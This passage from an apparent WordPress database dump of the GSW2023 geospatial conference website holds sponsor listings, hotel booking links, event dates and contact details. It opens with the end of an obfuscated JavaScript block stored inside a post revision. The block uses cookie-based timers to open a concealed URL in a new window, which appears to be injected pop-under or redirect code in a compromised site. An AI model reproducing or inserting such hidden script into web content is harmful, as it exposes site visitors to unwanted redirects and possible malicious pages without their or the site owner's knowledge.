_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:05:10','2023-07-10 01:05:10','',3066,'https://gsw2023.com/?p=4993',0,'revision','',0),
(4994,1,'2023-07-10 01:05:55','2023-07-10 01:05:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688950756889{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-4990\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 